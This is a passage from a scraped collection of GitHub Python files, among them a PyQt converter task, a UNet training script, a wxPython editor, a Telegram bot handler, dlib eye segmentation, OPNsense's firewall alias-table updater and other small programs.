print('Correct!')\nelse:\n count = 0\n while count < 3:\n print(' Wrong! Try again')\n count = count + 1\n else: \n \n print('Sorry, Wrong! 
The correct answer is', answer)\n\n","repo_name":"biodunduro/switch_biodun","sub_path":"Assignment_Guess_Word_extended.py","file_name":"Assignment_Guess_Word_extended.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818455272","text":"from typing import List\nfrom PyQt5.QtCore import QThread\nfrom pandas import DataFrame\n\nfrom src.converters.degrees2coordinates_converter import DegreesToCoordinatesConverter\nfrom src.converters.degrees_converter import DegreesConverter\nfrom src.converters.reference_converter import ReferenceConverter\nfrom src.converters.sonarplan_converter import SonarPlanConverter\nfrom src.converters.sonic_converter import SonicConverter\nfrom src.converters.time_converter import TimeConverter\nfrom src.converters.yards2coordinates_converter import IConverter, YardsToCoordinatesConverter\nfrom src.converters.yards_to_nm_converter import YardsToNMConverter\nfrom src.tasks.TaskBase import TaskBase\nfrom src.types import MerData\nfrom src.utility import get_exception\nimport numpy as np\n\nfrom src.log import get_logger\n\nconverters = [\n TimeConverter(),\n SonicConverter(),\n DegreesConverter(),\n YardsToNMConverter(),\n SonarPlanConverter(),\n YardsToCoordinatesConverter(),\n DegreesToCoordinatesConverter(),\n ReferenceConverter()\n]\n\n\nclass ConvertTask(TaskBase):\n logger = get_logger(__name__)\n\n def __init__(self, data: MerData):\n QThread.__init__(self)\n self.data: MerData = data\n\n # add converters\n # order does matter\n self.converters: List[IConverter] = list()\n self.init_converters()\n\n def run(self) -> None:\n try:\n self.emit_busy('Start convert')\n self.convert()\n except Exception as e:\n self.emit_failed('Convert failed: ' + get_exception(e))\n\n def convert(self) -> None:\n self.emit_busy('Converting data')\n\n data = self.data.copy()\n # hold tactical scenario\n tact_scenario: DataFrame = data['TACTICAL_SCENARIO'].original_df\n\n for converter in self.converters:\n # apply all converters to each model of the MerData object\n for name, dfm in data.items():\n # get scientific cols because only numeric cols will be converted\n scientific_cols: List[str] = dfm.original_df.select_dtypes(include=np.number).columns.tolist()\n\n converted_df: DataFrame = converter.convert(\n dfm.original_df,\n name=dfm.name,\n tact_scenario=tact_scenario,\n scientific_cols=scientific_cols\n )\n data[name].original_df = converted_df\n data[name].rename_columns()\n\n self.emit_busy('Convert success')\n self.task_finished.emit(data)\n\n def add_converter(self, c: IConverter) -> None:\n self.converters.append(c)\n\n def init_converters(self):\n for c in converters:\n self.add_converter(c)\n","repo_name":"jooppoelman/mer.io","sub_path":"src/tasks/convert_task.py","file_name":"convert_task.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27314237700","text":"from tqdm import tqdm\nimport torch # explicit import: torch.cuda.amp and torch.load are used below\nimport torch.nn as nn\nimport torch.optim as optim\nfrom unet import UNET\nfrom segnet import SegNet\nfrom loss import DiceLoss,SSIMLoss\nfrom utils import (\n load_checkpoint,\n save_checkpoint,\n get_loaders,\n check_accuracy,\n)\nfrom config import *\nimport cv2\nimport numpy as np\n\ndef train_fn(loader, model, optimizer, loss_fn, scaler):\n loop = tqdm(loader)\n\n for batch_idx, (data, targets) in enumerate(loop):\n data = data.to(device=DEVICE)\n targets = 
targets.float().unsqueeze(1).to(device=DEVICE)\n # targets = targets.float().permute(0,3,1,2).to(device=DEVICE)\n\n # forward\n with torch.cuda.amp.autocast():\n predictions = model(data)\n loss = loss_fn(predictions, targets)\n #for which photos the model predicted wrong ?\n if loss.item()>1.0:\n image=data.squeeze(0).permute(1,2,0).cpu()*255\n image=np.array(image,dtype=np.uint8)\n\n pred=nn.functional.sigmoid(predictions).squeeze(0).squeeze(0).detach().cpu()*255\n pred=np.array(pred,dtype=np.uint8)\n\n targets=targets.squeeze(0).squeeze(0).detach().cpu()*255\n targets=np.array(targets,dtype=np.uint8)\n\n cv2.imshow(\"pred\",pred)\n cv2.imshow(\"targets\",targets)\n cv2.imshow(\"image\",image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n # backward\n optimizer.zero_grad()\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n\n # update tqdm loop\n loop.set_postfix(loss=loss.item())\ndef main():\n model = UNET(in_channels=3, out_channels=1).to(DEVICE)\n loss_fn = DiceLoss().to(DEVICE)\n optimizer = optim.Adam(model.parameters(), lr=LEARNING_RATE,weight_decay=WEIGHT_DECAY)\n\n if LOAD_MODEL:\n load_checkpoint(torch.load(\"checkpoint40.pth.tar\"), model)\n\n\n train_loader ,val_loader= get_loaders(\n train_img_dir=TRAIN_IMG_DIR,\n train_mask_dir=TRAIN_MASK_DIR,\n test_img_dir=VAL_IMG_DIR,\n test_mask_dir=VAL_MASK_DIR,\n batch_size=1,\n train_transform=train_transform,\n val_transform=val_transforms,\n num_workers=NUM_WORKERS,\n pin_memory=PIN_MEMORY,\n )\n # check_accuracy(val_loader, model, device=DEVICE)\n scaler = torch.cuda.amp.GradScaler()\n\n for epoch in range(NUM_EPOCHS):\n\n train_fn(train_loader, model, optimizer, loss_fn, scaler)\n\n if epoch % 5==0:\n # save model\n checkpoint = {\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n }\n if SAVE_MODEL:\n save_checkpoint(checkpoint)\n # check accuracy\n check_accuracy(val_loader, model, device=DEVICE)\n\nif __name__ == \"__main__\":\n main()","repo_name":"bonj4/Segmentation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40944887342","text":"#!/usr/bin/env python\n\nimport os\nimport wx\nimport wx.gizmos as gizmos\nimport csv\n\n\nclass MainWindow(wx.Frame):\n\n def __init__(self, parent, title):\n wx.Frame.__init__(self, parent, title=title, size=(200, 100))\n self.CreateStatusBar() # A StatusBar in the bottom of the window\n\n # Setting up the menu.\n filemenu = wx.Menu()\n\n # wx.ID_ABOUT and wx.ID_EXIT are standard ids provided by wxWidgets.\n menuOpen = filemenu.Append(wx.ID_OPEN, \"&Open\", \" Open a file to edit\")\n menuSave = filemenu.Append(\n wx.ID_SAVE, \"&Save\", \" Save the current file\")\n menuAbout = filemenu.Append(\n wx.ID_ABOUT, \"&About\", \" Information about this program\")\n menuExit = filemenu.Append(\n wx.ID_EXIT, \"E&xit\", \" Terminate the program\")\n\n # Creating the menubar.\n menuBar = wx.MenuBar()\n # Adding the \"filemenu\" to the MenuBar\n menuBar.Append(filemenu, \"&File\")\n self.SetMenuBar(menuBar) # Adding the MenuBar to the Frame content.\n\n # Set events.\n self.Bind(wx.EVT_MENU, self.OnOpen, menuOpen)\n self.Bind(wx.EVT_MENU, self.OnAbout, menuAbout)\n # self.Bind(wx.EVT_MENU, self.OnSave, menuSave)\n self.Bind(wx.EVT_MENU, self.OnExit, menuExit)\n\n self.Show(True)\n\n def OnOpen(self, e):\n self.dirname = ''\n dlg = wx.FileDialog(\n self, \"Choose a file\", self.dirname, \"\", \"*.*\", 
wx.OPEN)\n if dlg.ShowModal() == wx.ID_OK:\n self.filename = dlg.GetFilename()\n self.dirname = dlg.GetDirectory()\n\n with open(os.path.join(self.dirname, self.filename), 'r') as f:\n r = csv.reader(f)\n names, stockeds = [], []\n for i, row in enumerate(r):\n names.append(row[0])\n stockeds.append(bool(int(row[1])))\n\n # cb = wx.CheckBox(self, pos=(5, 20*i))\n # nb = wx.StaticText(self, pos=(50, 20*i), label=name)\n # cb.SetValue(stocked)\n # self.controls.append(cb)\n # # self.cl = wx.CheckListBox(self, pos=(5, 20), choices=names)\n # for i in range(len(stockeds)):\n # if stockeds[i]:\n # self.cl.Check(i)\n\n self.tree = gizmos.TreeListCtrl(self, -1, style=\n wx.TR_DEFAULT_STYLE\n #| wx.TR_HAS_BUTTONS\n #| wx.TR_TWIST_BUTTONS\n #| wx.TR_ROW_LINES\n #| wx.TR_COLUMN_LINES\n #| wx.TR_NO_LINES\n | wx.TR_FULL_ROW_HIGHLIGHT\n )\n\n # create some columns\n self.tree.AddColumn(\"Main column\")\n self.tree.AddColumn(\"Column 1\")\n self.tree.AddColumn(\"Column 2\")\n self.tree.SetMainColumn(0) # the one with the tree in it...\n self.tree.SetColumnWidth(0, 175)\n\n self.root = self.tree.AddRoot(\"The Root Item\")\n self.tree.SetItemText(self.root, \"col 1 root\", 1)\n self.tree.SetItemText(self.root, \"col 2 root\", 2)\n\n for x in range(15):\n txt = \"Item %d\" % x\n child = self.tree.AppendItem(self.root, txt)\n self.tree.SetItemText(child, txt + \"(c1)\", 1)\n self.tree.SetItemText(child, txt + \"(c2)\", 2)\n\n for y in range(5):\n txt = \"item %d-%s\" % (x, chr(ord(\"a\") + y))\n last = self.tree.AppendItem(child, txt)\n self.tree.SetItemText(last, txt + \"(c1)\", 1)\n self.tree.SetItemText(last, txt + \"(c2)\", 2)\n\n for z in range(5):\n txt = \"item %d-%s-%d\" % (x, chr(ord(\"a\") + y), z)\n item = self.tree.AppendItem(last, txt)\n self.tree.SetItemText(item, txt + \"(c1)\", 1)\n self.tree.SetItemText(item, txt + \"(c2)\", 2)\n\n self.tree.Expand(self.root)\n\n # self.tree.GetMainWindow().Bind(wx.EVT_RIGHT_UP, self.OnRightUp)\n # self.tree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnActivate)\n\n dlg.Destroy()\n\n def OnAbout(self, e):\n # A message dialog box with an OK button. wx.OK is a standard ID in\n # wxWidgets.\n dlg = wx.MessageDialog(\n self, \"A small text editor\", \"About Sample Editor\", wx.OK)\n dlg.ShowModal() # Show it\n dlg.Destroy() # finally destroy it when finished.\n\n def OnExit(self, e):\n self.Close(True) # Close the frame.\n\napp = wx.App(False)\nframe = MainWindow(None, \"Sample editor\")\napp.MainLoop()\n","repo_name":"eddiejessup/proja","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13036218125","text":"#\n# Prelab6Ejercicio2.py\n#\n# DESCRIPTION: Exercise from Prelaboratory 5, modified with a subprogram for the calculations.\n# The program computes the sum of the factorials from 0 to N. 
\n#\n# Autor:\n# Rosseline Rodriguez\n#\n# Ultima modificacion: 24/02/2018\n\nimport sys\n\n# SUBPROGRAMAS\n\n# Definicion del cuantificador productoria\ndef prod( iterable ):\n\tp = 1\n\tfor n in iterable:\n\t\tp *= n\n\treturn p\n\ndef sumaFactoriales(N: int) -> int:\n# ENTRADAS: N // limite de la suma de factoriales\n# SALIDAS: suma // valor de la suma de factoriales\n# PRE: N >= 0\n# POST: suma == sum ( prod( j for j in range(1,i+1) ) for i in range(0,N+1) )\n\n# Variables locales: \n# fact : int // auxiliar para el calculo del factorial \n# cota : int // valor de la cota del ciclo\n# k : int // variable de control del ciclo\n\n try: \n # Precondicion: valor de N positivo\n assert(N >= 0)\n except:\n print(\"La precondicion no se cumple: valor negativo \")\n print(\"El programa terminara\")\n sys.exit()\n\t \n suma,fact,k = 0,1,0\n cota = N + 1 - k\n\n # Verificacion de invariante al inicio del ciclo\n try:\n assert(0<=k<=N+1 and (fact == prod( j for j in range(1,k) ) ) and suma == sum( prod( j for j in range(1,i+1) ) for i in range(0,k) ) )\n except:\n print(\"Hubo un error en el invariante para los siguientes valores\")\n print(\"k=\"+str(k)+\" fact=\"+str(fact)+\" suma=\"+str(suma))\n print(\"El programa terminara\")\n sys.exit()\n\n\t \n #Verificacion de la cota al inicio\n try:\n assert(cota >= 0)\n except:\n print(\"Error: cota negativa. El programa terminara \")\n print(\"cota=\"+str(cota))\n sys.exit()\n\n while(k<=N):\n if( k>0 ):\n fact = fact*k\n else:\n pass\n suma = suma+fact\n k = k + 1\n\t\n #Verificacion de invariante en cada iteracion\n try:\n assert( \n 0<=k<=N+1 and fact == prod ( j for j in range(1,k) ) and suma == sum ( prod ( j for j in range(1,i+1) ) for i in range(0,k) ) \n )\n except:\n print(\"Hubo un error en el invariante para los siguientes valores\")\n print(\"k=\"+str(k)+\" fact=\"+str(fact)+\" suma=\"+str(suma))\n print(\"El programa terminara\")\n sys.exit()\n \n #Verificacion de cota decreciente en cada iteracion\t \n try:\n assert(cota > N+1-k) \n except:\n print(\"Error: cota no decreciente. El programa terminara \")\n print(\"cota anterior =\"+str(cota)+\" nueva cota =\"+str(N-k+1))\n sys.exit()\n\n cota = N+1 - k\n #Verificacion de la cota no negativa en cada iteracion\n try:\n assert(cota >= 0)\n except:\n print(\"Error: cota negativa. El programa terminara \")\n print(\"cota=\"+str(cota))\n sys.exit()\n\n # Postcondicion:\n assert( suma == sum ( prod( j for j in range(1,i+1) ) for i in range(0,N+1) ) )\n\n return (suma)\n# FIN de sumaFactoriales\n\n# PROGRAMA PRINCIPAL\n \n# Variables: \n# N : int // ENTRADA: natural que limita la suma\n# suma : int // SALIDA: suma de los factoriales\n\n# Valores iniciales:\nwhile (True):\n N = int(input(\"Introduzca un entero positivo: \"))\n\n # Precondicion: se verifica la pre porque se hace programacion robusta\n try:\n assert(N >= 0)\n break\n except:\n print(\"La precondicion no se cumple: valor negativo \")\n print(\"Vuelva a intentar\")\n\n# Calculos\nsuma = sumaFactoriales(N)\n\n# Aquí no se verifica la post. 
Ya se verifico en el subprograma.\n# Es muy sencillo el codigo del programa principal seria redundante\n\n# Salida:\nprint(\"la suma de los factoriales de cero a\", N ,\"es:\")\nprint(suma)\n\n# FIN DEL PROGRAMA PRINCIPAL","repo_name":"mfaria724/CI2691-lab-algoritmos-1","sub_path":"Laboratorio 06/PreLaboratorio/Soluciones/Prelab6ejercicio2.py","file_name":"Prelab6ejercicio2.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1940826146","text":"import argparse\nimport uvicorn\nfrom fastapi import FastAPI\n\napp = FastAPI()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\", type=str, required=True, help=\"Name of the user\")\n\n@app.get(\"/\")\nasync def index(name: str):\n return {\"message\": f\"Hello, {name}\"}\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n name = args.name\n uvicorn.run(app, port=8000)\n","repo_name":"ranjeetrj/tech-stuff-Devops","sub_path":"shell-scripts/fastapi/my-api-file.py","file_name":"my-api-file.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41979760020","text":"import asyncio\nfrom time import time\nfrom datetime import datetime\nfrom modules.helpers.filters import command\nfrom modules.helpers.command import commandpro\nfrom pyrogram import Client, filters\nfrom pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton\n\n\nSTART_TIME = datetime.utcnow()\nSTART_TIME_ISO = START_TIME.replace(microsecond=0).isoformat()\nTIME_DURATION_UNITS = (\n ('week', 60 * 60 * 24 * 7),\n ('day', 60 * 60 * 24),\n ('hour', 60 * 60),\n ('min', 60),\n ('sec', 1)\n)\n\nasync def _human_time_duration(seconds):\n if seconds == 0:\n return 'inf'\n parts = []\n for unit, div in TIME_DURATION_UNITS:\n amount, seconds = divmod(int(seconds), div)\n if amount > 0:\n parts.append('{} {}{}'\n .format(amount, unit, \"\" if amount == 1 else \"s\"))\n return ', '.join(parts)\n \n \n\n@Client.on_message(command(\"start\") & filters.private & ~filters.edited)\nasync def start_(client: Client, message: Message):\n await message.reply_photo(\n photo=f\"https://te.legra.ph/file/53461fb7bd54fad831355.jpg\",\n caption=f\"\"\"**━━━━━━━━━━━━━━━━━━━━━━━━\nAdd me to your group and enjoy the high quality songs over telegram video chat feature. 
\n┏━━━━━━━━━━━━━━━━━┓\n┣★ Developer : [Aditya](https://t.me/swssy)\n┗━━━━━━━━━━━━━━━━━┛\nReach out to the admins for any issue.\n━━━━━━━━━━━━━━━━━━━━━━━━**\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n \"❰ ᴊᴏɪɴ ʜᴇʀᴇ ғᴏʀ ᴜᴘᴅᴀᴛᴇs ❱\", url=f\"https://t.me/swssy\")\n ]\n \n ]\n ),\n )\n \n \n@Client.on_message(commandpro([\"/start\", \"/alive\", \"aditya\", \"near\"]) & filters.group & ~filters.edited)\nasync def start(client: Client, message: Message):\n await message.reply_photo(\n photo=f\"https://te.legra.ph/file/b0cbf256b34584cce041a.jpg\",\n caption=f\"\"\"\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n \"ᴊᴏɪɴ ʜᴇʀᴇ ᴀɴᴅ sᴜᴘᴘᴏʀᴛ\", url=f\"https://t.me/swssy\")\n ]\n ]\n ),\n )\n\n","repo_name":"spark3600/AdityaNewPlayer","sub_path":"plugins/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32028236831","text":"# https://leetcode.com/problems/valid-parenthesis-string/\n\n\"\"\" \nGiven a string s containing only three types of characters: '(', ')' and '*', return true if s is valid.\n\nThe following rules define a valid string:\n\nAny left parenthesis '(' must have a corresponding right parenthesis ')'.\nAny right parenthesis ')' must have a corresponding left parenthesis '('.\nLeft parenthesis '(' must go before the corresponding right parenthesis ')'.\n'*' could be treated as a single right parenthesis ')' or a single left parenthesis '(' or an empty string \"\".\n \n\nExample 1:\nInput: s = \"()\"\nOutput: true\n\nExample 2:\nInput: s = \"(*)\"\nOutput: true\n\nExample 3:\nInput: s = \"(*))\"\nOutput: true \n\n\"\"\"\n\n# Solution\n\"\"\" \nIntuition:\nOne pass on the string S,\nwe need to know,\nhow many ')' we are waiting for.\n\nIf we meet too many ')', we can return false directly.\nIf we wait for no ')' at the end, then we are good.\n\n\nExplanation:\nWe count the number of ')' we are waiting for,\nand it's equal to the number of open parenthesis.\nThis number will be in a range and we count it as [cmin, cmax]\n\ncmax counts the maximum open parenthesis,\nwhich means the maximum number of unbalanced '(' that COULD be paired.\ncmin counts the minimum open parenthesis,\nwhich means the number of unbalanced '(' that MUST be paired.\n\n\nExample:\nIt's quite straight forward actually.\nWhen you met \"(\", you know you need one only one \")\", cmin = 1 and cmax = 1.\nWhen you met \"(*(\", you know you need one/two/three \")\", cmin = 1 and cmax = 3.\n\nThe string is valid for 2 condition:\n\ncmax will never be negative.\ncmin is 0 at the end.\n\"\"\"\n\n\nclass Solution:\n def checkValidString(self, s: str) -> bool:\n count_left = 0\n count_right = 0\n count_any = 0\n\n cmin = cmax = 0\n\n for i in s:\n if i == '(':\n cmax += 1\n cmin += 1\n elif i == ')':\n cmax -= 1\n cmin -= 1\n elif i == '*':\n cmax += 1\n cmin -= 1\n # cmax++; if `*` become `(` then openCount++\n # cmin--; if `*` become `)` then openCount--\n # if `*` become `` then nothing happens\n # So openCount will be in new range [cmin-1, cmax+1]\n\n if cmax < 0:\n return False\n\n cmin = max(cmin, 0)\n\n return cmin == 0\n","repo_name":"atharvaagrawal/dsa","sub_path":"Striver-A2Z/12_Greedy_Algorithms/1_Easy/5_valid-parenthesis-string.py","file_name":"5_valid-parenthesis-string.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
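The cmin/cmax greedy in the valid-parenthesis record above is easiest to trust after tracing the bound updates on a few inputs. A minimal sanity harness, assuming the Solution class exactly as defined in that record; the extra test strings are illustrative, not from the source:

# hypothetical check of the cmin/cmax greedy; Solution is the class from the record above
sol = Solution()
assert sol.checkValidString("()")          # plain balanced pair
assert sol.checkValidString("(*)")         # '*' can be treated as empty
assert sol.checkValidString("(*))")        # '*' must act as '(' here
assert not sol.checkValidString(")(")      # cmax drops below 0 at index 0
assert not sol.checkValidString("(")       # cmin ends at 1, so it never closes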
+{"seq_id":"12161752742","text":"\"\"\"\nProgram to detect face and facial keypoints of given images using the dlib library\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport dlib\n\nleft = [36, 37, 38, 39, 40, 41] # keypoint indices for left eye\nright = [42, 43, 44, 45, 46, 47] # keypoint indices for right eye\nimg_path = \"test_images\\\\face1.png\"\nmodel_path = \"models\\\\shape_68.dat\"\n\ndef rect_to_bb(rect):\n \"\"\"\n Take a dlib bouding box and convert it to (x, y, w, h) format used in opencv\n \"\"\"\n x = rect.left()\n y = rect.top()\n w = rect.right() - x\n h = rect.bottom() - y\n return (x, y, w, h)\n\ndef shape_to_np(shape, dtype=\"int\"):\n \"\"\" \n Converts 68 facial keypoints shape to numpy array\n \"\"\"\n coords = np.zeros((68, 2), dtype=dtype)\n for i in range(0, 68):\n coords[i] = (shape.part(i).x, shape.part(i).y)\n return coords\n\ndef eye_on_mask(shape, mask, side):\n \"\"\"\n Convex filling to create mask for eye keypoints\n \"\"\"\n points = [shape[i] for i in side]\n points = np.array(points, dtype=np.int32)\n mask = cv2.fillConvexPoly(mask, points, 255)\n return mask\n\ndef detect_face(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # convert to grayscale \n detector = dlib.get_frontal_face_detector()\n rects = detector(gray, 1) # rects contains all the faces detected\n\n bboxes = []\n for rect in rects:\n bbox = rect_to_bb(rect)\n bboxes.append(bbox)\n x, y, w, h = bbox\n start_pt = (x, y)\n end_pt = (x+w, y+h)\n cv2.rectangle(img, start_pt, end_pt, (255, 0, 0), 2)\n cv2.imshow(\"Bouding Boxes\", img)\n \n predictor = dlib.shape_predictor(model_path)\n for (i, rect) in enumerate(rects):\n # predicting facial keypoints\n shape = predictor(gray, rect)\n shape = shape_to_np(shape)\n\n # # plotting keypoints\n # for (x, y) in shape:\n # cv2.circle(img, (x, y), 2, (0, 255, 0), -1)\n\n # creating mask for eyes\n mask = np.zeros(img.shape[:2], dtype=np.uint8)\n # cv2.imshow(\"Blank mask\", mask)\n mask = eye_on_mask(shape, mask, left)\n # cv2.imshow(\"Left eye mask\", mask)\n mask = eye_on_mask(shape, mask, right)\n # cv2.imshow(\"Left + Right eye mask\", mask)\n\n # processing the mask\n kernel = np.ones((9, 9), np.uint8)\n mask = cv2.dilate(mask, kernel, 5)\n eyes = cv2.bitwise_and(img, img, mask=mask)\n cv2.imshow(\"Segmented eyes\", eyes)\n mask = (eyes == [0, 0, 0]).all(axis=2)\n eyes[mask] = [255, 255, 255]\n eyes_gray = cv2.cvtColor(eyes, cv2.COLOR_BGR2GRAY)\n cv2.imshow(\"eye mask\", eyes_gray)\n\n # thresholding to segement eyeballs\n def nothing(x):\n pass\n cv2.namedWindow('image')\n cv2.createTrackbar('threshold', 'image', 0, 255, nothing)\n threshold = cv2.getTrackbarPos('threshold', 'image')\n _, thresh = cv2.threshold(eyes_gray, threshold, 255, cv2.THRESH_BINARY)\n thresh = cv2.erode(thresh, None, iterations=2)\n thresh = cv2.dilate(thresh, None, iterations=4)\n thresh = cv2.medianBlur(thresh, 3)\n\n cv2.imshow(\"img\", img)\n\n# cap = cv2.VideoCapture(0)\n# while(True):\n# ret, img = cap.read()\n# detect_face(img)\n# if cv2.waitKey(1) & 0xFF == ord('q'): # escape when q is pressed\n# break\n\nimg = cv2.imread(img_path)\ndetect_face(img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"ParthGupta11/eye-tracker","sub_path":"scripts/test_scripts/script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24353400432","text":"import urllib.request\nimport urllib.parse\nimport sys\nimport io\n\nsys.stdout = 
io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\nAPI = \"https://api.ipify.org\"\n\nvalues = {\n 'format': 'json'\n}\nparams = urllib.parse.urlencode(values)\n\n#요청 URL 생성\nurl = API + \"?\" + params\n\n#읽기\ndata = urllib.request.urlopen(url).read()\ntext = data.decode(\"utf-8\")\n\nprint(text)","repo_name":"coldcaphe/pythonParsing","sub_path":"download2-3-1.py","file_name":"download2-3-1.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10623392860","text":"import os\nimport sys\nimport argparse\nimport json\nimport xml.etree.cElementTree as ET\nimport syslog\nimport glob\nfrom lib.alias import AliasParser\nfrom lib.alias.pf import PF\nfrom lib.alias.geoip import GEOIP\n\n\nif __name__ == '__main__':\n result = {'status': 'ok'}\n parser = argparse.ArgumentParser()\n parser.add_argument('--output', help='output type [json/text]', default='json')\n parser.add_argument('--source_conf', help='configuration xml', default='/usr/local/etc/filter_tables.conf')\n parser.add_argument('--aliases', help='aliases to update (targetted), comma separated', type=lambda x: x.split(','))\n parser.add_argument('--types', help='alias types to update (comma seperated)', type=lambda x: x.split(','))\n inputargs = parser.parse_args()\n syslog.openlog('firewall', facility=syslog.LOG_LOCAL4)\n\n # make sure our target directory exists\n if not os.path.isdir('/var/db/aliastables'):\n os.makedirs('/var/db/aliastables')\n\n # make sure we download geoip data if not found. Since aliases only will trigger a download when change requires it\n if not os.path.isfile('/usr/local/share/GeoIP/alias.stats'):\n GEOIP().download()\n\n try:\n source_tree = ET.ElementTree(file=inputargs.source_conf)\n except ET.ParseError as e:\n syslog.syslog(syslog.LOG_ERR, 'filter table parse error (%s) %s' % (str(e), inputargs.source_conf))\n sys.exit(-1)\n\n aliases = AliasParser(source_tree)\n aliases.read()\n\n # collect \"to_update\" list, when not set (None) we're planning to update all following normal lifetime rules.\n to_update = None\n if inputargs.aliases is not None or inputargs.types is not None:\n to_update = inputargs.aliases if inputargs.aliases is not None else []\n if inputargs.types is not None:\n for alias in aliases:\n if alias.get_type() in inputargs.types:\n to_update.append(alias.get_name())\n\n use_cached = lambda x: to_update is not None and x not in to_update\n for alias in aliases:\n # fetch alias content including dependencies\n # when a distinct set of aliases is offered, use current contents for all other alias types\n alias_name = alias.get_name()\n alias_content = alias.cached() if use_cached(alias_name) else alias.resolve()\n alias_changed_or_expired = max(alias.changed(), alias.expired())\n for related_alias_name in aliases.get_alias_deps(alias_name):\n if related_alias_name != alias_name:\n rel_alias = aliases.get(related_alias_name)\n if rel_alias:\n alias_content += rel_alias.cached() if use_cached(related_alias_name) else rel_alias.resolve()\n alias_changed_or_expired = max(alias_changed_or_expired, rel_alias.changed(), rel_alias.expired())\n\n # only try to replace the contents of this alias if we're responsible for it (know how to parse)\n if alias.get_parser():\n # when the alias or any of it's dependencies has changed, generate new\n if alias_changed_or_expired or not os.path.isfile('/var/db/aliastables/%s.txt' % 
alias_name):\n open('/var/db/aliastables/%s.txt' % alias_name, 'w').write('\\n'.join(sorted(alias_content)))\n\n # list current alias content when not trying to update a targetted list\n alias_pf_content = list(PF.list_table(alias_name)) if to_update is None else alias_content\n\n if (len(alias_content) != len(alias_pf_content) or alias_changed_or_expired):\n # if the alias is changed, expired or the one in memory has a different number of items, load table\n if len(alias_content) == 0:\n if len(alias_pf_content) > 0:\n # flush when target is empty\n PF.flush(alias_name)\n else:\n # replace table contents with collected alias\n error_output = PF.replace(alias_name, '/var/db/aliastables/%s.txt' % alias_name)\n if error_output.find('pfctl: ') > -1:\n error_message = \"Error loading alias [%s]: %s {current_size: %d, new_size: %d}\" % (\n alias_name,\n error_output.replace('pfctl: ', ''),\n len(alias_pf_content),\n len(alias_content),\n )\n result['status'] = 'error'\n if 'messages' not in result:\n result['messages'] = list()\n if error_output not in result['messages']:\n result['messages'].append(error_message)\n syslog.syslog(syslog.LOG_NOTICE, error_message)\n\n # cleanup removed aliases when reloading all\n if to_update is None:\n registered_aliases = [alias.get_name() for alias in aliases if alias.is_managed()]\n to_remove = list()\n to_remove_files = dict()\n for filename in glob.glob('/var/db/aliastables/*.txt'):\n aliasname = os.path.basename(filename).split('.')[0]\n if aliasname not in registered_aliases:\n if aliasname not in to_remove_files:\n to_remove_files[aliasname] = list()\n # in order to remove files the alias should either be managed externally or not exist at all\n if aliasname not in to_remove and (filename.find('.md5.') > 0 or aliases.get(aliasname) is None):\n # only remove files if there's a checksum\n to_remove.append(aliasname)\n to_remove_files[aliasname].append(filename)\n for aliasname in to_remove:\n syslog.syslog(syslog.LOG_NOTICE, 'remove old alias %s' % aliasname)\n PF.remove(aliasname)\n for filename in to_remove_files[aliasname]:\n os.remove(filename)\n\n print (json.dumps(result))\n","repo_name":"opnsense/core","sub_path":"src/opnsense/scripts/filter/update_tables.py","file_name":"update_tables.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":2702,"dataset":"github-code","pt":"72"} +{"seq_id":"13867358189","text":"#!/usr/bin/env python\n\nfrom SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler\nimport os\nimport sys\nimport time\nimport daemon\nfrom multiprocessing import Process\nimport logging\n\nimport logging\nlog = logging.getLogger ( \"auto1\" )\nlog.addHandler ( logging.FileHandler ( \"/var/log/auto1.log\" ) )\nlog.setLevel ( logging.INFO )\n\n\nclass StreamToLogger(object):\n \"\"\"\n Fake file-like stream object that redirects writes to a logger instance.\n \"\"\"\n def __init__(self, logger, log_level=logging.INFO):\n self.logger = logger\n self.log_level = log_level\n self.linebuf = ''\n def write(self, buf):\n for line in buf.rstrip().splitlines():\n self.logger.log(self.log_level, line.rstrip())\n\t\t \n def isatty ( self ) :\n return False\t\n\t\n def flush ( self ): \n for handler in self.logger.handlers:\n handler.flush ()\n\n\"\"\"\nlogging.basicConfig(\n level=logging.DEBUG,\n 